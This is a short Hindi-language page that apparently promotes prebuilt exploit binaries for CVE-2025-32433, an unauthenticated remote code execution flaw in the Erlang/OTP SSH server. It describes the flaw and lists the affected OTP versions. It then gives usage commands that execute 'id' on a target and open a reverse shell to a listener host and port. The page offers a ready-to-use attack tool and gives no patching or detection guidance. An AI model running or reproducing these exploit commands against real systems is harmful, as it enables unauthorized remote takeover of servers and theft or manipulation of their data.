
CVE-2025-32433 Erlang/OTP SSH RCE एक्सप्लॉइट SSH दूरस्थ कोड निष्पादन भेद्यता एक्सप्लॉइट
Erlang/OTP SSH सर्वर में एक गंभीर कमजोरी पाई गई है, जो हमलावर को बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन (RCE) करने की अनुमति दे सकती है। SSH प्रोटोकॉल संदेश हैंडलिंग में एक त्रुटि का शोषण करके, एक दुर्भावनापूर्ण अभिनेता प्रभावित सिस्टम तक अनधिकृत पहुंच प्राप्त कर सकता है और बिना वैध क्रेडेंशियल्स के मनमाने कमांड निष्पादित कर सकता है। इससे उक्त होस्ट से समझौता हो सकता है, जिससे तीसरे पक्ष द्वारा संवेदनशील डेटा तक अनधिकृत पहुंच और हेरफेर, या डेनियल-ऑफ-सर्विस हमले हो सकते हैं।
OTP-27.3.2 और इससे पहले के
OTP-26.2.5.10 और इससे पहले के
OTP-25.3.2.19 और इससे पहले के
cve-2025-32433.exe 127.0.0.1 -c 'id'
./cve-2025-32433.lnx 127.0.0.1 -c 'id'
cve-2025-32433.exe 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
./cve-2025-32433.lnx 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
